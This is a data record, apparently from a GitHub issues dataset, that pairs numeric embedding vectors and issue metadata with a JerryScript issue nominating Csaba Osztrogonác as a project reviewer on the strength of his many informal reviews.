0.009405781514942646, -0.013523392379283905, -0.0013814311241731048, -0.006062804255634546, -0.01253186073154211, -0.028616711497306824, 0.036328624933958054, -0.003773329546675086, -0.0017196880653500557, 0.023824306204915047, 0.009316268377006054, -0.017599690705537796, 0.005773607175797224, -0.007388289552181959, 0.033023517578840256, -0.001007885206490755, -0.03343665599822998, -0.012965655885636806, 0.002299803076311946, -0.02473321184515953, -0.015065775252878666, 0.00804242491722107, 0.012442347593605518, 0.00806308165192604, 0.011375073343515396, 0.00802865345031023, 0.015547770075500011, 0.018632536754012108, -0.017200322821736336, -0.005580809433013201, 0.0030520588625222445, -0.003983341623097658, 0.023424940183758736, 0.0022275038063526154, -0.014446068555116653, 0.0001107081479858607, -0.007677486166357994, 0.0020760197658091784, 0.006840881425887346, 0.01714523881673813, -0.005618680268526077, -0.00446877907961607, -0.019321098923683167, -0.008379821665585041, -0.01417064294219017, 0.008441791869699955, 0.0109412781894207, 0.012800401076674461, -0.03032434917986393, -0.0015380793483927846, 0.019376184791326523, -0.012676458805799484, -0.021662216633558273, -0.020505430176854134, 0.022240610793232918, -0.01032845675945282, -0.002690562978386879, -0.00337740546092391, -0.021868785843253136, -0.011161618866026402, -0.008187022991478443, -0.015506456606090069, 0.011230475269258022, -0.003281006356701255, 0.002143154852092266, 0.00827653706073761, 0.018825333565473557, 0.0404600091278553, 0.005897548981010914, -0.028313742950558662, 0.006940722931176424, 0.03698964789509773, -0.005184885114431381, -0.01196723897010088, -0.021992728114128113, -0.014473610557615757, 0.0017067774897441268, 0.009963518008589745, 0.01664947159588337, 0.0266474187374115, -0.004193353466689587, 0.0022825889755040407, 0.00007337507850024849, 0.00868967454880476, 0.001075020176358521, 0.0002182962343795225, -0.0003438515414018184, 0.006871866527944803, 0.018384652212262154, -0.0031519008334726095, -0.0022498820908367634, -0.019389955326914787, 0.00011748619726859033, 0.015231030993163586, -0.004024655092507601, 0.012394147925078869, 0.01936241425573826, 0.005797707010060549, 0.029718412086367607, 0.0027869618497788906, -0.016071079298853874, 0.011912153102457523, 0.007766999304294586, 0.012573175132274628, 0.0033687984105199575, 0.0008796402253210545, -0.0109412781894207, 0.0003040439332835376, 0.015093318186700344, -0.01916961558163166, 0.002795568900182843, 0.0001695588289294392, 0.005184885114431381, -0.021992728114128113, 0.0003434211830608547, -0.0029109034221619368, 0.014735264703631401, 0.01418441440910101, 0.0035702032037079334, -0.007870283909142017, -0.0017799374181777239, 0.017269179224967957, 0.013220424763858318, -0.006517256144434214, -0.00480961799621582, -0.0148316640406847, -0.0024667796678841114, 0.016167476773262024, -0.02624805085361004, 0.025518173351883888, 0.008985757827758789, -0.002449565567076206, -0.00811128132045269, -0.00968120712786913, -0.009116584435105324, 0.020147375762462616, -0.00046693230979144573, 0.0024650583509355783, 0.004096954595297575, 0.007147292140871286, -0.020450344309210777, 0.002317017177119851, 0.009908433072268963, -0.02237832359969616, -0.007223034277558327, 0.0021758615039288998, -0.005456868093460798, -0.003952356055378914, 0.0013564706314355135, 0.02555948682129383, -0.014556238427758217, 0.02287408895790577, -0.016704557463526726, -0.011416387744247913, 0.009997946210205555, 0.00008192833047360182, -0.009047728031873703, -0.015905823558568954, -0.012125608511269093, 0.01702129654586315, -0.0009880890138447285, 0.001224782783538103, -0.031370967626571655, -0.008992643095552921, -0.0063279010355472565, -0.005828692577779293, -0.0021793043706566095, -0.029718412086367607, 0.0017730518011376262, -0.008441791869699955, -0.013447650708258152, -0.00024357944494113326, 0.005814921110868454, 0.026027711108326912, 0.018618764355778694, 0.01541005726903677, -0.00026466671261005104, 0.012456119060516357, -0.014074243605136871, -0.005064386408776045, 0.013172225095331669, -0.022598663344979286, 0.017503291368484497, -0.026234280318021774, -0.001693866914138198, 0.01012877281755209, 0.0075397733598947525, 0.008792959153652191, 0.014012273401021957, 0.00799422524869442, 0.007402060553431511, -0.011622956953942776, 0.0056358943693339825, -0.015038233250379562, -0.014473610557615757, 0.0026354778092354536, 0.0035874173045158386, 0.0013822917826473713, -0.01254563219845295, 0.004052198026329279, 0.014459839090704918, 0.04070788994431496, -0.0017601412255316973, -0.0020295416470617056, 0.016139935702085495, 0.01549268513917923, 0.005374240223318338, -0.014556238427758217, -0.009405781514942646, 0.008786073885858059, -0.00804242491722107, 0.0038938282523304224, -0.009777605533599854, -0.0203264020383358, -0.04715284705162048, -0.010342228226363659, 0.021014966070652008, -0.006496599409729242, -0.006420857273042202, 0.009791377000510693, -0.010782908648252487, -0.00868967454880476, 0.02803831733763218, 0.0041210544295609, 0.0067616961896419525, 0.026261823251843452, -0.016332732513546944, 0.006558570079505444, 0.019982121884822845, 0.01582319661974907, -0.0040900688618421555, -0.009853348135948181, 0.01669078692793846, 0.003993669990450144, 0.01718655228614807, 0.017751174047589302, -0.006262487731873989, -0.00806308165192604, 0.00971563532948494, -0.02204781211912632, -0.018164312466979027, 0.002063969848677516, 0.007078435737639666, 0.01572679728269577, 0.005732293706387281, -0.013330594636499882, -0.0016723492881283164, 0.006358886603266001, 0.00485781766474247, 0.0037974293809384108, 0.011168504133820534, -0.017833802849054337, 0.020202461630105972, 0.006820224225521088, -0.02065691351890564, -0.020849712193012238, 0.04379265755414963, 0.0015897216508165002, 0.027556322515010834, -0.0060387044213712215, -0.014611323364078999, 0.006496599409729242, -0.005704750772565603, 0.008421135134994984, -0.0022016826551407576, 0.01269711647182703, 0.001797151518985629, 0.012834829278290272, -0.003876614151522517, 0.0025063722860068083, -0.004720104858279228, -0.005195213947445154, 0.009922204539179802, -0.006661854684352875, -0.012125608511269093, -0.0180403720587492, -0.028052087873220444, -0.010080574080348015, 0.021331705152988434, -0.019954578951001167, 0.001736902166157961, -0.013964073732495308, 0.01625010557472706, -0.025270290672779083, 0.017833802849054337, -0.016677014529705048, 0.025710972025990486, -0.014418525621294975, 0.0028282757848501205, -0.004671905189752579, -0.00581836374476552, -0.0035598748363554478, -0.003666602075099945, 0.013213538564741611, 0.0003169545088894665, -0.010011717677116394, 0.0027370410971343517, -0.0004036705067846924, -0.010693395510315895, -0.008930671960115433, 0.005567037966102362, -0.01688358373939991, -0.004895688500255346, -0.011547214351594448, -0.002511536469683051, 0.010053031146526337, 0.0061247749254107475, 0.010507483035326004, 0.0030245163943618536, -0.0041348254308104515, -0.010624539107084274, 0.019389955326914787, 0.002609656658023596, -0.0014106950256973505, -0.01843973807990551, 0.0047820755280554295, -0.015299887396395206, -0.014556238427758217, -0.0029814811423420906, 0.0062418305315077305, -0.015217259526252747, -0.00015083850303199142, 0.00009645272075431421, 0.031894274055957794, -0.005704750772565603, 0.023218370974063873, 0.017489520832896233, 0.0012178971664980054, -0.016800956800580025, -0.006355443503707647, 0.00271810544654727, -0.0265510194003582, 0.008992643095552921, -0.003320598741993308, 0.002838604152202606, -0.014363440684974194, 0.008669017814099789, -0.00593541981652379, -0.0041795819997787476, -0.00885493028908968, -0.007822084240615368, 0.004472221713513136, -0.008682789281010628, -0.02817603014409542, -0.016511758789420128, 0.028754424303770065, 0.0037113588768988848, 0.013833246193826199, -0.010638310573995113, -0.008462448604404926, 0.017172779887914658, 0.009577922523021698, -0.009164784103631973, 0.006582669913768768, 0.006506927777081728, 0.0027094983961433172, 0.003341255709528923, 0.015933366492390633, -0.032031986862421036, 0.003621845506131649, -0.005842463579028845, 0.00547752482816577, 0.029911210760474205, 0.001452869619242847, -0.011533443816006184, 0.007587973028421402, 0.012063637375831604, -0.01952766813337803, -0.007429603021591902, 0.018398424610495567, 0.013296166434884071, 0.011285560205578804, -0.011202932335436344, 0.017365578562021255, -0.00035310411476530135, -0.0024392371997237206, 0.0032896134071052074, -0.0041761393658816814, 0.044976986944675446, 0.002167254453524947, -0.008304079063236713, -0.004616820253431797, -0.00601804768666625, 0.02303934469819069, 0.007133520673960447, 0.018467281013727188, 0.012022323906421661, -0.006300358567386866, 0.029773497954010963, 0.0017489519668743014, -0.002014049096032977, 0.01525857299566269, -0.012607603333890438, 0.033188775181770325, 0.012944999150931835, 0.006610212381929159, 0.00022507428366225213, 0.03985407203435898, -0.009825805202126503, -0.008138824254274368, 0.0010121887316927314, 0.0225160364061594, -0.004974873270839453, 0.006930394563823938, -0.02853408269584179, -0.022392094135284424, 0.02482960931956768, 0.030186636373400688, 0.02129039168357849, 0.0022171754390001297, -0.004034983925521374, 0.010032374411821365, 0.003942027688026428, 0.004675348289310932, -0.024017104879021645, -0.015217259526252747, -0.005233084782958031, -0.01238037645816803, 0.022034041583538055, -0.008455563336610794, -0.004620262887328863, 0.016511758789420128, 0.0023032459430396557, -0.0004708054766524583, 0.01963783986866474, 0.014239499345421791, -0.011616070754826069, -0.005319155286997557, -0.014074243605136871, 0.013661105185747147, 0.013585363514721394, 0.008304079063236713, 0.02062937058508396, -0.019486354663968086, 0.003556431969627738, 0.005539495497941971, 0.0210562814027071, 0.0008615654078312218, -0.0033085490576922894, 0.01168492715805769, 0.040046870708465576, -0.008669017814099789, -0.005494738928973675, -0.015313658863306046, 0.010266485624015331, -0.0075397733598947525, 0.009419552981853485, 0.007305661682039499, 0.0036838161759078503, -0.007395174819976091, -0.011533443816006184, 0.002706055762246251, 0.010342228226363659, 0.009364467114210129, 0.03329894319176674, -0.014845435507595539, -0.010170087218284607, -0.002601049607619643, 0.0024805511347949505, 0.0041210544295609 ]
3,022
null
null
null
null
null
null
null
null
null
[ "jerryscript-project", "jerryscript" ]
I would like to nominate Csaba Osztrogonác to become a JerryScript reviewer. I trust him to follow our processes. He has already given 50+ informal reviews and other valuable inputs: #4395 #4388 #4381 #4330 #4329 #4317 #4296 #4288 #4278 #4256 #4253 #4247 #4246 #4230 #4226 #4223 #4181 #4172 #4153 #4152 #4145 #4140 #4102 #4086 #4084 #4035 #4026 #4007 #3981 #3967 #3949 #3942 #3925 #3915 #3912 #3907 #3906 #3900 #3879 #3838 #3792 #3742 #3617 #3598 #3576 #3567 #3496 #3338 #3318 #3224 #3146 Seconds are welcome.
Nominating Csaba Osztrogonác (@ossy-szeged) to become a JerryScript reviewer
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4435/comments
7
2021-01-08T14:37:49
2021-01-15T15:13:41Z
https://github.com/jerryscript-project/jerryscript/issues/4435
782,162,965
4,435
false
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : Nominating Csaba Osztrogonác (@ossy-szeged) to become a JerryScript reviewer Issue date: --- start body --- I would like to nominate Csaba Osztrogonác to become a JerryScript reviewer. I trust him to follow our processes. He has already given 50+ informal reviews and other valuable inputs: #4395 #4388 #4381 #4330 #4329 #4317 #4296 #4288 #4278 #4256 #4253 #4247 #4246 #4230 #4226 #4223 #4181 #4172 #4153 #4152 #4145 #4140 #4102 #4086 #4084 #4035 #4026 #4007 #3981 #3967 #3949 #3942 #3925 #3915 #3912 #3907 #3906 #3900 #3879 #3838 #3792 #3742 #3617 #3598 #3576 #3567 #3496 #3338 #3318 #3224 #3146 Seconds are welcome. --- end body ---
768
[ -0.0017181941075250506, -0.00908094272017479, -0.028213366866111755, -0.020885415375232697, 0.030816521495580673, 0.007008200511336327, 0.01907975971698761, 0.035240378230810165, -0.03220085799694061, 0.034156981855630875, -0.017108585685491562, -0.006097848992794752, -0.0035229092463850975, 0.01631108857691288, 0.014761233702301979, 0.04628496989607811, -0.0030790187884122133, -0.009223890490829945, -0.07324942201375961, -0.013647746294736862, 0.021291688084602356, -0.0035624078009277582, 0.011879708617925644, 0.017499811947345734, 0.00298309326171875, -0.011420771479606628, 0.02223965711891651, 0.010359948500990868, -0.015408260747790337, -0.03978461027145386, 0.026302382349967957, 0.028198320418596268, -0.013482227921485901, -0.0064138388261199, 0.00172571768052876, -0.04520157724618912, 0.061241816729307175, 0.02974817529320717, -0.0000017670090528554283, -0.010563084855675697, 0.007553658913820982, -0.02068980224430561, -0.0272653978317976, -0.00815554428845644, 0.0006813528016209602, 0.045743271708488464, 0.013504798524081707, 0.018884146586060524, 0.002262711990624666, 0.021803289651870728, 0.06392020732164383, -0.00021101247693877667, 0.0077492715790867805, -0.0404466837644577, 0.020539332181215286, -0.01993744634091854, -0.03575197979807854, -0.01953117363154888, 0.02196880802512169, -0.00014776751049794257, -0.006406315136700869, 0.02834879234433174, -0.008652099408209324, 0.00540568120777607, 0.024812716990709305, 0.021923666819930077, -0.007832030765712261, 0.02490299940109253, -0.004359905607998371, 0.014746186323463917, -0.024511773139238358, -0.014400103129446507, 0.023443426936864853, 0.03821970894932747, -0.003342343494296074, -0.0018018936971202493, 0.0005059597315266728, 0.011661524884402752, -0.044358935207128525, -0.0409281924366951, 0.018342450261116028, 0.015709202736616135, 0.01780075393617153, 0.016130521893501282, -0.013384421356022358, -0.044419124722480774, 0.014385055750608444, -0.06674906611442566, -0.0061241816729307175, -0.026467900723218918, -0.014505432918667793, 0.021306734532117844, -0.027506152167916298, 0.022841542959213257, 0.020358765497803688, -0.01025461871176958, 0.0016269708285108209, 0.012805107049643993, -0.018176931887865067, -0.02703969180583954, 0.019696692004799843, -0.002635128563269973, 0.004205672536045313, 0.010013864375650883, 0.028860393911600113, 0.03325415402650833, -0.00947969127446413, -0.03701593726873398, 0.02773186005651951, 0.05001665651798248, 0.04023602232336998, 0.001479320926591754, -0.03165915980935097, -0.0061392285861074924, -0.04324544966220856, 0.009908534586429596, -0.03942347690463066, -0.020358765497803688, -0.022495457902550697, 0.01689792610704899, -0.0022702356800436974, 0.000784801843110472, -0.004950505681335926, -0.00044624143629334867, -0.01763523556292057, 0.0066282604821026325, 0.011149922385811806, 0.033103685826063156, 0.047067418694496155, 0.010721080005168915, -0.031057273969054222, -0.013023290783166885, -0.006564310286194086, -0.03078642673790455, 0.0547715499997139, 0.012857772409915924, 0.03966423124074936, 0.02877011150121689, -0.05522296577692032, -0.005811953451484442, -0.021111123263835907, -0.01130039431154728, 0.013730505481362343, 0.014084112830460072, 0.018026459962129593, 0.051039863377809525, -0.014392578974366188, 0.01649165339767933, -0.050407882779836655, 0.04240281134843826, 0.01689792610704899, 0.007884696125984192, -0.005394395906478167, -0.022916777059435844, 0.0058909510262310505, -0.01239131111651659, -0.028544403612613678, 0.028619639575481415, -0.016235852614045143, 0.015558731742203236, -0.04670628905296326, -0.02773186005651951, -0.0011821400839835405, 0.04375705122947693, -0.02852935716509819, 0.013128620572388172, -0.023308003321290016, 0.010999451391398907, -0.014565621502697468, 0.006838920060545206, -0.022871635854244232, -0.01971173845231533, 0.008215732872486115, 0.0007565884734503925, -0.025715544819831848, 0.02588106319308281, 0.02899581752717495, -0.013173761777579784, -0.007188765797764063, -0.02266097627580166, -0.003195634111762047, -0.008275921456515789, -0.020795132964849472, -0.01649165339767933, -0.003878397634252906, -0.01299319602549076, 0.06091077998280525, -0.014904181472957134, -0.007057103794068098, -0.019922399893403053, 0.004826366901397705, -0.0032313710544258356, 0.0031448500230908394, -0.0220139492303133, 0.03602282702922821, 0.02973312698304653, 0.01221826858818531, -0.018342450261116028, -0.013467180542647839, -0.039965175092220306, 0.002879644278436899, 0.003810685593634844, -0.005811953451484442, -0.07162433862686157, -0.017424575984477997, -0.003701593726873398, 0.038189612329006195, 0.014452767558395863, -0.020479142665863037, -0.05001665651798248, -0.008087831549346447, -0.030350059270858765, 0.036293674260377884, -0.02126159332692623, 0.0017304198117926717, -0.007726700976490974, 0.018763769418001175, -0.019726786762475967, -0.007974978536367416, 0.020042777061462402, 0.008885329589247704, -0.005097215063869953, 0.003710998222231865, -0.010510419495403767, 0.00605270778760314, 0.006579357199370861, -0.013820787891745567, -0.011924849823117256, 0.01247407030314207, 0.02178824320435524, 0.021336829289793968, 0.021818337962031364, -0.014309819787740707, 0.04149998351931572, -0.032712459564208984, -0.02985350415110588, 0.008719811215996742, -0.016521748155355453, 0.00960006844252348, -0.014753710478544235, -0.014136778190732002, 0.044990915805101395, -0.028604593127965927, -0.034096796065568924, 0.023834653198719025, 0.029176384210586548, -0.02160767838358879, 0.032652270048856735, 0.002947356551885605, -0.0067373523488640785, -0.014227060601115227, -0.03849055618047714, -0.004901602398604155, -0.017018303275108337, -0.006778731942176819, 0.004495329689234495, 0.014828945510089397, 0.0288754403591156, -0.025279177352786064, 0.012301027774810791, 0.003972442355006933, 0.02294687181711197, -0.013903547078371048, 0.026091722771525383, -0.04583355411887169, -0.010081576183438301, -0.020900461822748184, -0.001277125091291964, 0.01121011096984148, -0.032140668481588364, 0.015197600238025188, -0.03238142281770706, 0.031027181074023247, -0.015829579904675484, 0.023654086515307426, -0.006534215994179249, 0.00625584414228797, 0.018462827429175377, -0.0270246434956789, 0.03614320605993271, -0.0027047214098274708, 0.02150234766304493, 0.00609408738091588, 0.03220085799694061, -0.009171225130558014, 0.00690287072211504, 0.01647660695016384, -0.004747369326651096, -0.005793144926428795, -0.031448498368263245, -0.01242140494287014, -0.03545103594660759, 0.0071248156018555164, -0.029462279751896858, 0.008260874077677727, -0.0011369987623766065, -0.006703495979309082, 0.011571242474019527, -0.016988208517432213, -0.012737395241856575, -0.007376855239272118, -0.01752990484237671, -0.04137960448861122, 0.005586246959865093, -0.0126772066578269, 0.009389408864080906, -0.011473435908555984, 0.0067674461752176285, -0.01971173845231533, -0.02673874795436859, 0.03499962389469147, -0.01210541557520628, 0.006579357199370861, -0.03987489268183708, -0.024105500429868698, 0.004442664794623852, 0.03445792570710182, -0.009524832479655743, -0.04336582496762276, -0.02248041145503521, -0.016356229782104492, -0.02910114824771881, -0.04878279194235802, -0.04177083075046539, 0.007376855239272118, 0.009577497839927673, -0.027807094156742096, -0.00027602078625932336, -0.017590094357728958, 0.009216366335749626, 0.014385055750608444, -0.043486203998327255, -0.007809460163116455, -0.002031362382695079, -0.044419124722480774, -0.06337850540876389, -0.03960404545068741, 0.0740920677781105, 0.008531722240149975, -0.00008963621803559363, -0.037888672202825546, 0.00040274581988342106, -0.029326854273676872, 0.04715770483016968, 0.029417138546705246, -0.030997086316347122, 0.03659461811184883, 0.03761782497167587, 0.08293977379798889, -0.0008670908282510936, 0.0009037681738846004, -0.03117765113711357, 0.028393933549523354, 0.011044592596590519, 0.03921281918883324, -0.01536311861127615, -0.061542756855487823, -0.03566169738769531, 0.02115626446902752, 0.024827763438224792, 0.028890488669276237, -0.04824109748005867, -0.018658440560102463, 0.016130521893501282, 0.02288668416440487, 0.011774378828704357, -0.02050923742353916, -0.006955535616725683, -0.0005393455503508449, -0.05194269120693207, -0.027235303074121475, 0.004198148846626282, 0.005349254235625267, -0.030906803905963898, 0.003912253770977259, -0.002375565469264984, -0.01838759146630764, 0.007429520133882761, -0.02842402644455433, 0.02708483301103115, 0.008208208717405796, -0.06379982829093933, 0.045803461223840714, -0.011879708617925644, -0.020388860255479813, 0.011142399162054062, 0.0015319858212023973, 0.05606560409069061, -0.001062703551724553, 0.00197493564337492, -0.02339828573167324, 0.03999526798725128, -0.01420448999851942, -0.059797290712594986, -0.05016712844371796, -0.00899065937846899, -0.027566341683268547, -0.008373727090656757, 0.014535526745021343, 0.0023793273139744997, -0.006195655558258295, -0.047699399292469025, -0.0015949957305565476, 0.024541867896914482, -0.010465278290212154, -0.009878440760076046, -0.027761952951550484, -0.045683085918426514, -0.004130437038838863, -0.011104781180620193, -0.01504712924361229, -0.000048726837121648714, 0.0061392285861074924, 0.007557420525699854, 0.04327554255723953, 0.036293674260377884, 0.04375705122947693, 0.0072602396830916405, 0.015438354574143887, -0.00730538135394454, 0.03044034168124199, -0.032020289450883865, 0.0015348071465268731, 0.008418869227170944, 0.014242107979953289, -0.015588825568556786, -0.013978783041238785, 0.021773196756839752, 0.03897206485271454, -0.02842402644455433, -0.013760599307715893, 0.023879794403910637, -0.0011369987623766065, -0.0109768807888031, 0.024015218019485474, -0.03367547690868378, -0.0032783932983875275, -0.02863468788564205, -0.021938715130090714, 0.015995098277926445, 0.02305220253765583, -0.027536246925592422, -0.024918045848608017, 0.006349888630211353, 0.012263410724699497, -0.014136778190732002, -0.03123784065246582, 0.004593136254698038, -0.01671736128628254, 0.03153878450393677, 0.01895938254892826, -0.0018987596267834306, 0.00040110002737492323, 0.04149998351931572, -0.0338861346244812, -0.03993508219718933, -0.06867510080337524, 0.011781902052462101, -0.02812308445572853, -0.01924527809023857, -0.006553024984896183, 0.015340548008680344, -0.023262862116098404, -0.004758654627948999, -0.008742381818592548, 0.03849055618047714, -0.018477873876690865, -0.08011091500520706, 0.01781580038368702, 0.016446512192487717, 0.0065191686153411865, 0.0037805913016200066, 0.0572693757712841, -0.018944336101412773, 0.030530625954270363, 0.01752990484237671, 0.00956997461616993, 0.028619639575481415, -0.004920411389321089, 0.0007222621934488416, 0.0051611652597785, -0.0474887415766716, 0.0034796486143022776, 0.027536246925592422, 0.0410485677421093, -0.013091002590954304, 0.03153878450393677, 0.0016326134791597724, 0.020554378628730774, 0.005537343677133322, -0.02582087367773056, 0.003855826798826456, -0.014339914545416832, -0.01653679460287094, -0.006184370256960392, 0.010194430127739906, -0.009186272509396076, -0.0013627056032419205, 0.031087368726730347, -0.033344440162181854, -0.013233950361609459, -0.004453950095921755, 0.03430745378136635, -0.010743650607764721, 0.025098610669374466, 0.005984995514154434, -0.0343676432967186, -0.03785857558250427, -0.033765759319067, 0.008065260946750641, 0.004751130938529968, -0.024451585486531258, -0.0036714994348585606, -0.008418869227170944, -0.013820787891745567, -0.013106049969792366, -0.029838457703590393, 0.017544953152537346, 0.023413334041833878, 0.032652270048856735, 0.004040154162794352, -0.03280274197459221, -0.0033837230876088142, 0.008117926307022572, 0.03602282702922821, -0.010743650607764721, -0.02928171306848526, -0.001062703551724553, 0.012022656388580799, -0.009622639045119286, 0.002249545883387327, -0.012985672801733017, -0.012940531596541405, 0.015558731742203236, -0.004243290517479181, 0.023037154227495193, -0.0050031705759465694, 0.03644414618611336, -0.0018997000297531486, 0.01195494458079338, 0.018658440560102463, 0.025896109640598297, -0.05188250169157982, 0.013707934878766537, -0.005571199581027031, 0.008614481426775455, -0.00019526001415215433, -0.014317343942821026, 0.04577336832880974, 0.024060359224677086, -0.028664780780673027, -0.031779538840055466, 0.01793617755174637, 0.014573144726455212, 0.011977515183389187, -0.03515009209513664, -0.024225877597928047, 0.007233907468616962, 0.014731139875948429, -0.02564030885696411, 0.024361303076148033, 0.007786889560520649, 0.008193162269890308, -0.004066486842930317, -0.010939262807369232, -0.04086800292134285, -0.01775561273097992, 0.0144377201795578, -0.03704603388905525, 0.011420771479606628, 0.004709751345217228, -0.003415698418393731, 0.017394481226801872, -0.020193247124552727, -0.005548628978431225, 0.02600143849849701, -0.0017680376768112183, -0.014106683433055878, -0.03713631629943848, -0.006022613495588303, -0.011533624492585659, 0.011255253106355667, -0.0476091168820858, -0.009983770549297333, 0.03292311728000641, -0.015423307195305824, -0.018974430859088898, -0.011759331449866295, 0.02168291248381138, -0.03677518293261528, 0.0019674121867865324, -0.00864457618445158, -0.019516127184033394, -0.0011294751893728971, 0.013121096417307854, -0.031267933547496796, -0.007087198086082935, 0.03186982125043869, 0.01822207309305668, -0.015528636984527111, -0.01417439617216587, 0.00544706080108881, 0.029928740113973618, -0.002969927154481411, -0.010427660308778286, 0.010329854674637318, -0.013587557710707188, 0.0056426734663546085, -0.029477326199412346, -0.008110403083264828, -0.03683537244796753, 0.00706086540594697, 0.018146837130188942, -0.00015728952712379396, 0.009178749285638332, 0.018583204597234726, -0.0020125536248087883, 0.03211057558655739, 0.008057737722992897, 0.030289871618151665, 0.018703581765294075, -0.024602055549621582, 0.002556130988523364, 0.0062596057541668415, 0.029988927766680717, 0.03319396823644638, 0.008403821848332882, 0.017951225861907005, -0.02028352953493595, -0.010111670941114426, -0.030530625954270363, -0.0033893659710884094, -0.007331713568419218, -0.03031996637582779, -0.02864973433315754, 0.01659698411822319, 0.026212099939584732, 0.000851573480758816, 0.0027950042858719826, 0.00032986130099743605, 0.0029943787958472967, -0.014753710478544235, -0.02783718891441822, 0.06289699673652649, -0.030681096017360687, 0.01037499587982893, 0.002307853428646922, -0.007937360554933548, -0.0031674206256866455, 0.03162906691431999, -0.01584462635219097, -0.009291602298617363, 0.004563041962683201, 0.009622639045119286, 0.017033349722623825, 0.011270299553871155, 0.03978461027145386, 0.01288034301251173, -0.018237121403217316, -0.009464643895626068, -0.023548757657408714, 0.003530432702973485, 0.013572510331869125, 0.01787598989903927, -0.0014859039802104235, -0.017259057611227036, -0.02236003428697586, 0.0185531098395586, -0.009622639045119286, 0.023368190973997116, 0.028198320418596268, 0.009472168050706387, -0.024526821449398994, -0.007937360554933548, -0.03220085799694061, -0.01242140494287014, -0.020795132964849472, -0.020855320617556572, -0.00102978793438524, -0.009457120671868324, 0.0184929221868515, 0.0016072215512394905, 0.017559999600052834, -0.00908094272017479, -0.016175663098692894, 0.003195634111762047, -0.013542416505515575, 0.01907975971698761, 0.014114207588136196, 0.01484399288892746, -0.0073843784630298615, 0.04005545750260353, 0.013504798524081707, 0.04703732579946518, -0.0003686546697281301, 0.00190628319978714, 0.013813264667987823, 0.01259444747120142, -0.01631108857691288, -0.009795681573450565, -0.014979417435824871, -0.009178749285638332, 0.0034439116716384888, 0.0010457754833623767, -0.004698466043919325, 0.008719811215996742, 0.023383239284157753, -0.0050031705759465694, -0.022254703566432, -0.008855235762894154, 0.00013518905325327069, 0.016506701707839966, -0.004367429297417402, 0.004491568077355623, -0.01631108857691288, -0.021517394110560417, 0.02127664163708687, 0.010743650607764721, -0.04312507063150406, 0.020765038207173347, -0.022510506212711334, -0.00024498606217093766, -0.035360753536224365, -0.032080478966236115, 0.00463827745988965, -0.05176212638616562, 0.02893562987446785, 0.03147859498858452, -0.00009275144839193672, 0.008486581034958363, -0.004333573393523693, -0.024752527475357056, 0.0015780676621943712, -0.000037617821362800896, -0.030711190775036812, 0.0171236339956522, -0.017319245263934135, 0.0045367092825472355, 0.0012987552909180522, -0.010826409794390202, -0.018643392249941826, 0.009712922386825085, -0.02156253531575203, -0.01734934002161026, 0.007786889560520649, -0.010623273439705372, -0.005661482457071543, 0.01706344448029995, -0.012030179612338543, -0.011503530666232109, -0.00007076853216858581, 0.003983727656304836, -0.008900376968085766, -0.02864973433315754, -0.0109768807888031, 0.03430745378136635, -0.01786094158887863, 0.03156887739896774, 0.023955030366778374, 0.009607591666281223, 0.010390042327344418, 0.04727808013558388, -0.012933007441461086, 0.013271568343043327, 0.040085554122924805, 0.004010059870779514, 0.009833298623561859, -0.021803289651870728, 0.0015649014385417104, -0.007557420525699854, 0.020434001460671425, 0.012737395241856575, -0.006391268223524094, -0.004472759086638689, 0.04941477254033089, -0.0023605183232575655, -0.02011801116168499, -0.002307853428646922, -0.002781837945804, -0.008208208717405796, -0.0035153855569660664, -0.0010344901820644736, -0.012489117681980133, 0.030966991558670998, -0.013459657318890095, -0.004713513422757387, 0.01850796863436699, 0.006974344607442617, -0.029823409393429756, -0.0019692929927259684, -0.023563804104924202, -0.025685450062155724, -0.019982587546110153, -0.0010786911007016897, 0.006940488237887621, -0.03566169738769531, 0.02327790856361389, 0.025264130905270576, -0.01631108857691288, -0.008057737722992897, 0.027190161868929863, 0.020990746095776558, 0.0018639630870893598, 0.02121645212173462, 0.028664780780673027, -0.01230855192989111, -0.02610676921904087, -0.002116002608090639, -0.01918509043753147, 0.018974430859088898, -0.016642125323414803, -0.01689792610704899, -0.006007566582411528, -0.0038407796528190374, -0.0052589718252420425, -0.023503616452217102, -0.0006667759153060615, -0.00963016226887703, 0.0010796315036714077, 0.011232681572437286, -0.033344440162181854, -0.009773110039532185, 0.0018413924844935536, -0.029522467404603958, 0.0027592673432081938, 0.025835920125246048, 0.004468997474759817, 0.0025034660939127207, 0.029763221740722656, -0.005962424911558628, -0.0024846571031957865, 0.013730505481362343, -0.023548757657408714, 0.005845809821039438, -0.018688535317778587, -0.00040862360037863255, 0.00593609269708395, -0.020539332181215286, 0.03205038607120514, 0.056216076016426086, -0.008110403083264828, -0.0008797868504188955, -0.012361216358840466, 0.004991885274648666, -0.011104781180620193, -0.0219537615776062, -0.05037778988480568, 0.008945518173277378, 0.02685912512242794, -0.00524392444640398, 0.012902913615107536, 0.01590481586754322, -0.022344987839460373, 0.042041677981615067, -0.007847078144550323, -0.0004396582953631878, -0.001063643954694271, 0.005270257126539946, 0.02237508073449135, -0.021517394110560417, 0.01954622007906437, -0.022164421156048775, 0.002655818359926343, -0.01924527809023857, 0.025264130905270576, 0.00759127689525485, -0.010390042327344418, -0.03349490836262703, 0.010743650607764721, -0.005845809821039438, 0.00013577683421317488, 0.0272052101790905, 0.007410711143165827, -0.019395750015974045, -0.011511053889989853, 0.03406669944524765, -0.03539084643125534, -0.02022334188222885, -0.015769392251968384, 0.026844078674912453, 0.010412613861262798, 0.0034439116716384888, 0.005104738753288984, -0.011067163199186325, 0.05308627337217331, -0.03084661439061165, -0.011338012292981148, -0.01025461871176958, -0.007561182603240013, -0.017033349722623825, 0.009223890490829945, -0.0017877870704978704, -0.008569340221583843, -0.03587235510349274, 0.0187938641756773, 0.02657322958111763, -0.013647746294736862, 0.026091722771525383, -0.017830848693847656, 0.004374952986836433, -0.014520479366183281, -0.008847711607813835, -0.0024263495579361916, -0.03764791786670685, -0.013753076083958149, 0.037377070635557175, 0.008697240613400936, -0.02126159332692623, 0.011217635124921799, -0.011631431058049202, -0.01677754893898964, -0.0028138132765889168, -0.016687266528606415, -0.03590245172381401, -0.01573929749429226, 0.015995098277926445, -0.022856589406728745, -0.010517943650484085, 0.041349511593580246, 0.017544953152537346, -0.020494190976023674, 0.010540514253079891, -0.006677163764834404, -0.005853333510458469, -0.019501078873872757, -0.022104233503341675, -0.00826839730143547, -0.02767167054116726, 0.0037335690576583147, 0.04288432002067566, 0.017996367067098618, 0.025745637714862823, 0.0051611652597785, -0.02126159332692623, 0.01786094158887863, -0.03451811522245407, 0.011202587746083736, 